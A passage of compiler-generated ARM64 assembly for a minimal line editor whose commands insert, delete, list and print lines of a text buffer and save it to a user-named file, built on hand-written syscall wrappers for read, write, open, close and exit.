2 ; Child Loop BB0_101 Depth 2 ; Child Loop BB0_85 Depth 2 ; Child Loop BB0_88 Depth 3 ; Child Loop BB0_92 Depth 3 ; Child Loop BB0_60 Depth 2 ; Child Loop BB0_64 Depth 2 ; Child Loop BB0_68 Depth 2 ; Child Loop BB0_73 Depth 2 ; Child Loop BB0_77 Depth 2 ; Child Loop BB0_36 Depth 2 ; Child Loop BB0_40 Depth 2 ; Child Loop BB0_42 Depth 3 ; Child Loop BB0_48 Depth 2 adrp x0, l_.str.9@PAGE add x0, x0, l_.str.9@PAGEOFF mov w1, #1 bl _dputs add x0, sp, #115 mov w1, #5 mov w2, #0 bl _dgeti str w0, [sp, #92] subs w8, w0, #1024 cset w8, le tbnz w8, #0, LBB0_33 b LBB0_32 LBB0_32: ; in Loop: Header=BB0_31 Depth=1 adrp x0, l_.str.10@PAGE add x0, x0, l_.str.10@PAGEOFF mov w1, #1 bl _dputs b LBB0_31 LBB0_33: ; in Loop: Header=BB0_31 Depth=1 adrp x0, l_.str.11@PAGE add x0, x0, l_.str.11@PAGEOFF mov w1, #1 bl _dputs add x0, sp, #115 mov w1, #5 mov w2, #0 bl _dgets ldrsb w8, [sp, #115] subs w8, w8, #100 ; kill: def $x8 killed $w8 str x8, [sp, #40] ; 8-byte Folded Spill subs x8, x8, #15 cset w8, hi tbnz w8, #0, LBB0_130 ; %bb.34: ; in Loop: Header=BB0_31 Depth=1 ldr x11, [sp, #40] ; 8-byte Folded Reload adrp x10, lJTI0_0@PAGE add x10, x10, lJTI0_0@PAGEOFF Ltmp0: adr x8, Ltmp0 ldrsw x9, [x10, x11, lsl #2] add x8, x8, x9 br x8 LBB0_35: ; in Loop: Header=BB0_31 Depth=1 str wzr, [sp, #100] b LBB0_36 LBB0_36: ; Parent Loop BB0_31 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #100] subs w8, w8, #128 cset w8, ge tbnz w8, #0, LBB0_39 b LBB0_37 LBB0_37: ; in Loop: Header=BB0_36 Depth=2 ldr w8, [sp, #92] subs w9, w8, #1 ; implicit-def: $x8 mov x8, x9 sxtw x9, w8 add x8, sp, #1288 add x8, x8, x9, lsl #7 ldrsw x9, [sp, #100] add x8, x8, x9 strb wzr, [x8] b LBB0_38 LBB0_38: ; in Loop: Header=BB0_36 Depth=2 ldr w8, [sp, #100] add w8, w8, #1 str w8, [sp, #100] b LBB0_36 LBB0_39: ; in Loop: Header=BB0_31 Depth=1 ldr w8, [sp, #92] str w8, [sp, #100] b LBB0_40 LBB0_40: ; Parent Loop BB0_31 Depth=1 ; => This Loop Header: Depth=2 ; Child Loop BB0_42 Depth 3 ldr w8, [sp, #100] subs w8, w8, #1024 cset w8, ge tbnz w8, #0, LBB0_47 b LBB0_41 LBB0_41: ; in Loop: Header=BB0_40 Depth=2 str wzr, [sp, #96] b LBB0_42 LBB0_42: ; Parent Loop BB0_31 Depth=1 ; Parent Loop BB0_40 Depth=2 ; => This Inner Loop Header: Depth=3 ldr w8, [sp, #96] subs w8, w8, #128 cset w8, ge tbnz w8, #0, LBB0_45 b LBB0_43 LBB0_43: ; in Loop: Header=BB0_42 Depth=3 ldrsw x10, [sp, #100] add x9, sp, #1288 mov x8, x9 add x8, x8, x10, lsl #7 ldrsw x10, [sp, #96] add x8, x8, x10 ldrb w8, [x8] ldr w10, [sp, #100] subs w11, w10, #1 ; implicit-def: $x10 mov x10, x11 sxtw x10, w10 add x9, x9, x10, lsl #7 ldrsw x10, [sp, #96] add x9, x9, x10 strb w8, [x9] b LBB0_44 LBB0_44: ; in Loop: Header=BB0_42 Depth=3 ldr w8, [sp, #96] add w8, w8, #1 str w8, [sp, #96] b LBB0_42 LBB0_45: ; in Loop: Header=BB0_40 Depth=2 b LBB0_46 LBB0_46: ; in Loop: Header=BB0_40 Depth=2 ldr w8, [sp, #100] add w8, w8, #1 str w8, [sp, #100] b LBB0_40 LBB0_47: ; in Loop: Header=BB0_31 Depth=1 str wzr, [sp, #100] b LBB0_48 LBB0_48: ; Parent Loop BB0_31 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #100] subs w8, w8, #128 cset w8, ge tbnz w8, #0, LBB0_51 b LBB0_49 LBB0_49: ; in Loop: Header=BB0_48 Depth=2 mov x9, #130944 add x8, sp, #1288 add x8, x8, x9 ldrsw x9, [sp, #100] add x8, x8, x9 strb wzr, [x8] b LBB0_50 LBB0_50: ; in Loop: Header=BB0_48 Depth=2 ldr w8, [sp, #100] add w8, w8, #1 str w8, [sp, #100] b LBB0_48 LBB0_51: ; in Loop: Header=BB0_31 Depth=1 b LBB0_131 LBB0_52: ; in Loop: Header=BB0_31 Depth=1 ldr w8, [sp, #92] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_54 b LBB0_53 LBB0_53: ; in Loop: Header=BB0_31 Depth=1 adrp x0, l_.str.10@PAGE add x0, x0, l_.str.10@PAGEOFF mov w1, #1 bl _dputs b LBB0_131 LBB0_54: ; in Loop: Header=BB0_31 Depth=1 ldr w8, [sp, #92] subs w8, w8, #1 str w8, [sp, #92] ldrsw x8, [sp, #92] lsl x9, x8, #7 add x8, sp, #1288 ldrsb w8, [x8, x9] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB0_57 b LBB0_55 LBB0_55: ; in Loop: Header=BB0_31 Depth=1 ldrsw x8, [sp, #92] lsl x9, x8, #7 add x8, sp, #1288 ldrsb w8, [x8, x9] subs w8, w8, #10 cset w8, eq tbnz w8, #0, LBB0_57 b LBB0_56 LBB0_56: ; in Loop: Header=BB0_31 Depth=1 ldrsw x9, [sp, #92] add x8, sp, #1288 add x0, x8, x9, lsl #7 mov w1, #1 str w1, [sp, #36] ; 4-byte Folded Spill bl _dputs ldr w1, [sp, #36] ; 4-byte Folded Reload adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _dputs b LBB0_57 LBB0_57: ; in Loop: Header=BB0_31 Depth=1 add x0, sp, #136 mov w1, #127 mov w2, #0 bl _dgets subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB0_59 b LBB0_58 LBB0_58: ; in Loop: Header=BB0_31 Depth=1 b LBB0_131 LBB0_59: ; in Loop: Header=BB0_31 Depth=1 str wzr, [sp, #100] b LBB0_60 LBB0_60: ; Parent Loop BB0_31 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #100] subs w8, w8, #128 cset w8, ge tbnz w8, #0, LBB0_63 b LBB0_61 LBB0_61: ; in Loop: Header=BB0_60 Depth=2 ldrsw x9, [sp, #92] add x8, sp, #1288 add x8, x8, x9, lsl #7 ldrsw x9, [sp, #100] add x8, x8, x9 strb wzr, [x8] b LBB0_62 LBB0_62: ; in Loop: Header=BB0_60 Depth=2 ldr w8, [sp, #100] add w8, w8, #1 str w8, [sp, #100] b LBB0_60 LBB0_63: ; in Loop: Header=BB0_31 Depth=1 str wzr, [sp, #100] b LBB0_64 LBB0_64: ; Parent Loop BB0_31 Depth=1 ; => This Inner Loop Header: Depth=2 ldrsw x8, [sp, #100] str x8, [sp, #24] ; 8-byte Folded Spill add x0, sp, #136 bl _strlen ldr x8, [sp, #24] ; 8-byte Folded Reload subs x8, x8, x0 cset w8, hs tbnz w8, #0, LBB0_67 b LBB0_65 LBB0_65: ; in Loop: Header=BB0_64 Depth=2 ldrsw x9, [sp, #100] add x8, sp, #136 add x8, x8, x9 ldrb w8, [x8] ldrsw x10, [sp, #92] add x9, sp, #1288 add x9, x9, x10, lsl #7 ldrsw x10, [sp, #100] add x9, x9, x10 strb w8, [x9] b LBB0_66 LBB0_66: ; in Loop: Header=BB0_64 Depth=2 ldr w8, [sp, #100] add w8, w8, #1 str w8, [sp, #100] b LBB0_64 LBB0_67: ; in Loop: Header=BB0_31 Depth=1 ldrsw x9, [sp, #92] add x8, sp, #1288 add x8, x8, x9, lsl #7 ldrsw x9, [sp, #100] add x9, x8, x9 mov w8, #10 strb w8, [x9] str wzr, [sp, #100] b LBB0_68 LBB0_68: ; Parent Loop BB0_31 Depth=1 ; => This Inner Loop Header: Depth=2 ldrsw x8, [sp, #100] lsl x9, x8, #7 add x8, sp, #1288 ldrsb w8, [x8, x9] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB0_71 b LBB0_69 LBB0_69: ; in Loop: Header=BB0_68 Depth=2 b LBB0_70 LBB0_70: ; in Loop: Header=BB0_68 Depth=2 ldr w8, [sp, #100] add w8, w8, #1 str w8, [sp, #100] b LBB0_68 LBB0_71: ; in Loop: Header=BB0_31 Depth=1 ldr w8, [sp, #100] ldr w9, [sp, #92] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_81 b LBB0_72 LBB0_72: ; in Loop: Header=BB0_31 Depth=1 str wzr, [sp, #96] b LBB0_73 LBB0_73: ; Parent Loop BB0_31 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #96] subs w8, w8, #128 cset w8, ge tbnz w8, #0, LBB0_76 b LBB0_74 LBB0_74: ; in Loop: Header=BB0_73 Depth=2 ldrsw x10, [sp, #92] add x9, sp, #1288 mov x8, x9 add x8, x8, x10, lsl #7 ldrsw x10, [sp, #96] add x8, x8, x10 ldrb w8, [x8] ldrsw x10, [sp, #100] add x9, x9, x10, lsl #7 ldrsw x10, [sp, #96] add x9, x9, x10 strb w8, [x9] b LBB0_75 LBB0_75: ; in Loop: Header=BB0_73 Depth=2 ldr w8, [sp, #96] add w8, w8, #1 str w8, [sp, #96] b LBB0_73 LBB0_76: ; in Loop: Header=BB0_31 Depth=1 str wzr, [sp, #96] b LBB0_77 LBB0_77: ; Parent Loop BB0_31 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #96] subs w8, w8, #128 cset w8, ge tbnz w8, #0, LBB0_80 b LBB0_78 LBB0_78: ; in Loop: Header=BB0_77 Depth=2 ldrsw x9, [sp, #92] add x8, sp, #1288 add x8, x8, x9, lsl #7 ldrsw x9, [sp, #96] add x8, x8, x9 strb wzr, [x8] b LBB0_79 LBB0_79: ; in Loop: Header=BB0_77 Depth=2 ldr w8, [sp, #96] add w8, w8, #1 str w8, [sp, #96] b LBB0_77 LBB0_80: ; in Loop: Header=BB0_31 Depth=1 b LBB0_81 LBB0_81: ; in Loop: Header=BB0_31 Depth=1 b LBB0_131 LBB0_82: ; in Loop: Header=BB0_31 Depth=1 mov x9, #130944 add x8, sp, #1288 ldrsb w8, [x8, x9] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB0_84 b LBB0_83 LBB0_83: ; in Loop: Header=BB0_31 Depth=1 adrp x0, l_.str.12@PAGE add x0, x0, l_.str.12@PAGEOFF mov w1, #2 bl _dputs b LBB0_131 LBB0_84: ; in Loop: Header=BB0_31 Depth=1 mov w8, #1022 str w8, [sp, #100] b LBB0_85 LBB0_85: ; Parent Loop BB0_31 Depth=1 ; => This Loop Header: Depth=2 ; Child Loop BB0_88 Depth 3 ; Child Loop BB0_92 Depth 3 ldr w8, [sp, #100] ldr w9, [sp, #92] subs w9, w9, #1 subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB0_98 b LBB0_86 LBB0_86: ; in Loop: Header=BB0_85 Depth=2 ldrsw x8, [sp, #100] lsl x9, x8, #7 add x8, sp, #1288 ldrsb w8, [x8, x9] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB0_96 b LBB0_87 LBB0_87: ; in Loop: Header=BB0_85 Depth=2 str wzr, [sp, #96] b LBB0_88 LBB0_88: ; Parent Loop BB0_31 Depth=1 ; Parent Loop BB0_85 Depth=2 ; => This Inner Loop Header: Depth=3 ldr w8, [sp, #96] subs w8, w8, #128 cset w8, ge tbnz w8, #0, LBB0_91 b LBB0_89 LBB0_89: ; in Loop: Header=BB0_88 Depth=3 ldrsw x10, [sp, #100] add x9, sp, #1288 mov x8, x9 add x8, x8, x10, lsl #7 ldrsw x10, [sp, #96] add x8, x8, x10 ldrb w8, [x8] ldr w10, [sp, #100] add w11, w10, #1 ; implicit-def: $x10 mov x10, x11 sxtw x10, w10 add x9, x9, x10, lsl #7 ldrsw x10, [sp, #96] add x9, x9, x10 strb w8, [x9] b LBB0_90 LBB0_90: ; in Loop: Header=BB0_88 Depth=3 ldr w8, [sp, #96] add w8, w8, #1 str w8, [sp, #96] b LBB0_88 LBB0_91: ; in Loop: Header=BB0_85 Depth=2 str wzr, [sp, #96] b LBB0_92 LBB0_92: ; Parent Loop BB0_31 Depth=1 ; Parent Loop BB0_85 Depth=2 ; => This Inner Loop Header: Depth=3 ldr w8, [sp, #96] subs w8, w8, #128 cset w8, ge tbnz w8, #0, LBB0_95 b LBB0_93 LBB0_93: ; in Loop: Header=BB0_92 Depth=3 ldrsw x9, [sp, #100] add x8, sp, #1288 add x8, x8, x9, lsl #7 ldrsw x9, [sp, #96] add x8, x8, x9 strb wzr, [x8] b LBB0_94 LBB0_94: ; in Loop: Header=BB0_92 Depth=3 ldr w8, [sp, #96] add w8, w8, #1 str w8, [sp, #96] b LBB0_92 LBB0_95: ; in Loop: Header=BB0_85 Depth=2 b LBB0_96 LBB0_96: ; in Loop: Header=BB0_85 Depth=2 b LBB0_97 LBB0_97: ; in Loop: Header=BB0_85 Depth=2 ldr w8, [sp, #100] subs w8, w8, #1 str w8, [sp, #100] b LBB0_85 LBB0_98: ; in Loop: Header=BB0_31 Depth=1 ldrsw x9, [sp, #92] add x8, sp, #1288 add x9, x8, x9, lsl #7 mov w8, #10 strb w8, [x9] b LBB0_131 LBB0_99: ; in Loop: Header=BB0_31 Depth=1 ldr w8, [sp, #92] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_111 b LBB0_100 LBB0_100: ; in Loop: Header=BB0_31 Depth=1 str wzr, [sp, #100] b LBB0_101 LBB0_101: ; Parent Loop BB0_31 Depth=1 ; => This Inner Loop Header: Depth=2 ldrsw x8, [sp, #100] lsl x9, x8, #7 add x8, sp, #1288 ldrsb w8, [x8, x9] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB0_110 b LBB0_102 LBB0_102: ; in Loop: Header=BB0_101 Depth=2 ldr w8, [sp, #100] subs w8, w8, #999 cset w8, ge tbnz w8, #0, LBB0_104 b LBB0_103 LBB0_103: ; in Loop: Header=BB0_101 Depth=2 adrp x0, l_.str.13@PAGE add x0, x0, l_.str.13@PAGEOFF mov w1, #1 bl _dputs b LBB0_104 LBB0_104: ; in Loop: Header=BB0_101 Depth=2 ldr w8, [sp, #100] subs w8, w8, #99 cset w8, ge tbnz w8, #0, LBB0_106 b LBB0_105 LBB0_105: ; in Loop: Header=BB0_101 Depth=2 adrp x0, l_.str.13@PAGE add x0, x0, l_.str.13@PAGEOFF mov w1, #1 bl _dputs b LBB0_106 LBB0_106: ; in Loop: Header=BB0_101 Depth=2 ldr w8, [sp, #100] subs w8, w8, #9 cset w8, ge tbnz w8, #0, LBB0_108 b LBB0_107 LBB0_107: ; in Loop: Header=BB0_101 Depth=2 adrp x0, l_.str.13@PAGE add x0, x0, l_.str.13@PAGEOFF mov w1, #1 bl _dputs b LBB0_108 LBB0_108: ; in Loop: Header=BB0_101 Depth=2 ldr w8, [sp, #100] mov w1, #1 str w1, [sp, #20] ; 4-byte Folded Spill add w0, w8, #1 bl _dputi ldr w1, [sp, #20] ; 4-byte Folded Reload adrp x0, l_.str.13@PAGE add x0, x0, l_.str.13@PAGEOFF bl _dputs ldr w1, [sp, #20] ; 4-byte Folded Reload ldrsw x9, [sp, #100] add x8, sp, #1288 add x0, x8, x9, lsl #7 bl _dputs b LBB0_109 LBB0_109: ; in Loop: Header=BB0_101 Depth=2 ldr w8, [sp, #100] add w8, w8, #1 str w8, [sp, #100] b LBB0_101 LBB0_110: ; in Loop: Header=BB0_31 Depth=1 b LBB0_115 LBB0_111: ; in Loop: Header=BB0_31 Depth=1 ldr w8, [sp, #92] subs w9, w8, #1 ; implicit-def: $x8 mov x8, x9 sxtw x8, w8 lsl x9, x8, #7 add x8, sp, #1288 ldrsb w8, [x8, x9] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_113 b LBB0_112 LBB0_112: ; in Loop: Header=BB0_31 Depth=1 adrp x0, l_.str.10@PAGE add x0, x0, l_.str.10@PAGEOFF mov w1, #1 bl _dputs b LBB0_114 LBB0_113: ; in Loop: Header=BB0_31 Depth=1 ldr w8, [sp, #92] mov w1, #1 subs w9, w8, #1 ; implicit-def: $x8 mov x8, x9 sxtw x9, w8 add x8, sp, #1288 add x0, x8, x9, lsl #7 bl _dputs b LBB0_114 LBB0_114: ; in Loop: Header=BB0_31 Depth=1 b LBB0_115 LBB0_115: ; in Loop: Header=BB0_31 Depth=1 b LBB0_131 LBB0_116: b LBB0_132 LBB0_117: ; in Loop: Header=BB0_31 Depth=1 ldr w8, [sp, #88] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_119 b LBB0_118 LBB0_118: ; in Loop: Header=BB0_31 Depth=1 adrp x0, l_.str.14@PAGE add x0, x0, l_.str.14@PAGEOFF mov w1, #1 str w1, [sp, #16] ; 4-byte Folded Spill bl _dputs add x0, sp, #264 mov w1, #1024 mov w2, #0 bl _dgets ldr w8, [sp, #16] ; 4-byte Folded Reload str w8, [sp, #88] b LBB0_119 LBB0_119: ; in Loop: Header=BB0_31 Depth=1 add x0, sp, #264 mov w1, #513 mov w2, #420 bl _open mov x8, x0 mov x9, x0 str w9, [sp, #104] adds w8, w8, #1 cset w8, ne tbnz w8, #0, LBB0_121 b LBB0_120 LBB0_120: ; in Loop: Header=BB0_31 Depth=1 adrp x0, l_.str.15@PAGE add x0, x0, l_.str.15@PAGEOFF mov w1, #2 str w1, [sp, #12] ; 4-byte Folded Spill bl _dputs ldr w1, [sp, #12] ; 4-byte Folded Reload add x0, sp, #264 bl _dputs ldr w1, [sp, #12] ; 4-byte Folded Reload adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _dputs b LBB0_131 LBB0_121: ; in Loop: Header=BB0_31 Depth=1 str wzr, [sp, #92] b LBB0_122 LBB0_122: ; Parent Loop BB0_31 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #92] subs w8, w8, #1024 cset w8, ge tbnz w8, #0, LBB0_127 b LBB0_123 LBB0_123: ; in Loop: Header=BB0_122 Depth=2 ldrsw x8, [sp, #92] lsl x9, x8, #7 add x8, sp, #1288 ldrsb w8, [x8, x9] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_125 b LBB0_124 LBB0_124: ; in Loop: Header=BB0_31 Depth=1 b LBB0_127 LBB0_125: ; in Loop: Header=BB0_122 Depth=2 ldrsw x9, [sp, #92] add x8, sp, #1288 add x0, x8, x9, lsl #7 ldr w1, [sp, #104] bl _dputs b LBB0_126 LBB0_126: ; in Loop: Header=BB0_122 Depth=2 ldr w8, [sp, #92] add w8, w8, #1 str w8, [sp, #92] b LBB0_122 LBB0_127: ; in Loop: Header=BB0_31 Depth=1 ldr w0, [sp, #104] bl _close adds x8, x0, #1 cset w8, ne tbnz w8, #0, LBB0_129 b LBB0_128 LBB0_128: ; in Loop: Header=BB0_31 Depth=1 adrp x0, l_.str.8@PAGE add x0, x0, l_.str.8@PAGEOFF mov w1, #2 str w1, [sp, #8] ; 4-byte Folded Spill bl _dputs ldr w1, [sp, #8] ; 4-byte Folded Reload add x0, sp, #264 bl _dputs ldr w1, [sp, #8] ; 4-byte Folded Reload adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _dputs mov w0, #1 bl __exit b LBB0_129 LBB0_129: ; in Loop: Header=BB0_31 Depth=1 b LBB0_131 LBB0_130: ; in Loop: Header=BB0_31 Depth=1 adrp x0, l_.str.10@PAGE add x0, x0, l_.str.10@PAGEOFF mov w1, #1 bl _dputs b LBB0_131 LBB0_131: ; in Loop: Header=BB0_31 Depth=1 b LBB0_31 LBB0_132: ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_134 b LBB0_133 LBB0_133: bl ___stack_chk_fail LBB0_134: mov w0, #0 add sp, sp, #32, lsl #12 ; =131072 add sp, sp, #1296 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload ldp x28, x27, [sp], #32 ; 16-byte Folded Reload ret .cfi_endproc .p2align 2 lJTI0_0: .long LBB0_35-Ltmp0 .long LBB0_130-Ltmp0 .long LBB0_130-Ltmp0 .long LBB0_130-Ltmp0 .long LBB0_130-Ltmp0 .long LBB0_52-Ltmp0 .long LBB0_130-Ltmp0 .long LBB0_130-Ltmp0 .long LBB0_130-Ltmp0 .long LBB0_130-Ltmp0 .long LBB0_82-Ltmp0 .long LBB0_130-Ltmp0 .long LBB0_99-Ltmp0 .long LBB0_116-Ltmp0 .long LBB0_130-Ltmp0 .long LBB0_117-Ltmp0 ; -- End function .p2align 2 ; -- Begin function dputs _dputs: ; @dputs .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur w1, [x29, #-12] ldur w8, [x29, #-12] str w8, [sp, #16] ; 4-byte Folded Spill ldur x8, [x29, #-8] str x8, [sp, #8] ; 8-byte Folded Spill ldur x0, [x29, #-8] bl _strlen ldr x1, [sp, #8] ; 8-byte Folded Reload mov x2, x0 ldr w0, [sp, #16] ; 4-byte Folded Reload bl _write ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .p2align 2 ; -- Begin function _exit __exit: ; @_exit .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] ldursw x1, [x29, #-4] mov x0, #1 mov x5, #0 mov x2, x5 mov x3, x5 mov x4, x5 bl __syscall ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .p2align 2 ; -- Begin function strlen _strlen: ; @strlen .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str x0, [sp, #8] ldr x8, [sp, #8] str x8, [sp] b LBB3_1 LBB3_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp] ldrsb w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB3_3 b LBB3_2 LBB3_2: ; in Loop: Header=BB3_1 Depth=1 ldr x8, [sp] add x8, x8, #1 str x8, [sp] b LBB3_1 LBB3_3: ldr x8, [sp] ldr x9, [sp, #8] subs x0, x8, x9 add sp, sp, #16 ret .cfi_endproc ; -- End function .p2align 2 ; -- Begin function open _open: ; @open .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #8] str w1, [sp, #4] str w2, [sp] ldr x1, [sp, #8] ldrsw x2, [sp, #4] ldrsw x3, [sp] mov x0, #5 mov x5, #0 mov x4, x5 bl __syscall ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .p2align 2 ; -- Begin function read _read: ; @read .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] str x1, [sp, #16] str x2, [sp, #8] ldursw x1, [x29, #-4] ldr x2, [sp, #16] ldr x3, [sp, #8] mov x0, #3 mov x5, #0 mov x4, x5 bl __syscall ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .p2align 2 ; -- Begin function dputi _dputi: ; @dputi .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] stur w1, [x29, #-8] str wzr, [sp, #12] b LBB6_1 LBB6_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-4] mov w10, #10 sdiv w9, w8, w10 mul w9, w9, w10 subs w8, w8, w9 add w8, w8, #48 ldrsw x10, [sp, #12] mov x9, x10 add w9, w9, #1 str w9, [sp, #12] sub x9, x29, #13 strb w8, [x9, x10] b LBB6_2 LBB6_2: ; in Loop: Header=BB6_1 Depth=1 ldur w8, [x29, #-4] mov w9, #10 sdiv w8, w8, w9 stur w8, [x29, #-4] subs w8, w8, #0 cset w8, gt tbnz w8, #0, LBB6_1 b LBB6_3 LBB6_3: ldr w8, [sp, #12] subs w8, w8, #1 str w8, [sp, #12] b LBB6_4 LBB6_4: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] subs w8, w8, #0 cset w8, lt tbnz w8, #0, LBB6_7 b LBB6_5 LBB6_5: ; in Loop: Header=BB6_4 Depth=1 ldur w0, [x29, #-8] ldrsw x9, [sp, #12] sub x8, x29, #13 add x1, x8, x9 mov x2, #1 bl _write b LBB6_6 LBB6_6: ; in Loop: Header=BB6_4 Depth=1 ldr w8, [sp, #12] subs w8, w8, #1 str w8, [sp, #12] b LBB6_4 LBB6_7: ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .p2align 2 ; -- Begin function close _close: ; @close .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] ldursw x1, [x29, #-4] mov x0, #6 mov x5, #0 mov x2, x5 mov x3, x5 mov x4, x5 bl __syscall ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .p2align 2 ; -- Begin function dgeti _dgeti: ; @dgeti .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-16] stur w1, [x29, #-20] str w2, [sp, #24] str wzr, [sp, #16] str wzr, [sp, #20] b LBB8_1 LBB8_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #20] ldur w9, [x29, #-20] subs w9, w9, #1 subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB8_11 b LBB8_2 LBB8_2: ; in Loop: Header=BB8_1 Depth=1 ldr w0, [sp, #24] ldur x8, [x29, #-16] ldrsw x9, [sp, #20] add x1, x8, x9 mov x2, #1 bl _read subs x8, x0, #1 cset w8, ge tbnz w8, #0, LBB8_4 b LBB8_3 LBB8_3: stur wzr, [x29, #-4] b LBB8_20 LBB8_4: ; in Loop: Header=BB8_1 Depth=1 ldur x8, [x29, #-16] ldrsw x9, [sp, #20] ldrsb w8, [x8, x9] subs w8, w8, #10 cset w8, ne tbnz w8, #0, LBB8_6 b LBB8_5 LBB8_5: b LBB8_11 LBB8_6: ; in Loop: Header=BB8_1 Depth=1 ldur x8, [x29, #-16] ldrsw x9, [sp, #20] ldrsb w8, [x8, x9] subs w8, w8, #48 cset w8, lt tbnz w8, #0, LBB8_8 b LBB8_7 LBB8_7: ; in Loop: Header=BB8_1 Depth=1 ldur x8, [x29, #-16] ldrsw x9, [sp, #20] ldrsb w8, [x8, x9] subs w8, w8, #57 cset w8, le tbnz w8, #0, LBB8_9 b LBB8_8 LBB8_8: ; in Loop: Header=BB8_1 Depth=1 mov w8, #1 str w8, [sp, #16] b LBB8_9 LBB8_9: ; in Loop: Header=BB8_1 Depth=1 b LBB8_10 LBB8_10: ; in Loop: Header=BB8_1 Depth=1 ldr w8, [sp, #20] add w8, w8, #1 str w8, [sp, #20] b LBB8_1 LBB8_11: ldur x8, [x29, #-16] ldrsw x9, [sp, #20] add x8, x8, x9 strb wzr, [x8] ldur x8, [x29, #-16] ldrsb w8, [x8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB8_13 b LBB8_12 LBB8_12: stur wzr, [x29, #-4] b LBB8_20 LBB8_13: ldr w8, [sp, #16] subs w8, w8, #1 cset w8, ne tbnz w8, #0, LBB8_15 b LBB8_14 LBB8_14: mov w8, #1025 stur w8, [x29, #-4] b LBB8_20 LBB8_15: str wzr, [sp, #16] str wzr, [sp, #20] b LBB8_16 LBB8_16: ; =>This Inner Loop Header: Depth=1 ldrsw x8, [sp, #20] str x8, [sp, #8] ; 8-byte Folded Spill ldur x0, [x29, #-16] bl _strlen ldr x8, [sp, #8] ; 8-byte Folded Reload subs x8, x8, x0 cset w8, hs tbnz w8, #0, LBB8_19 b LBB8_17 LBB8_17: ; in Loop: Header=BB8_16 Depth=1 ldr w8, [sp, #16] mov w9, #10 mul w8, w8, w9 ldur x9, [x29, #-16] ldrsw x10, [sp, #20] ldrsb w9, [x9, x10] subs w9, w9, #48 add w8, w8, w9 str w8, [sp, #16] b LBB8_18 LBB8_18: ; in Loop: Header=BB8_16 Depth=1 ldr w8, [sp, #20] add w8, w8, #1 str w8, [sp, #20] b 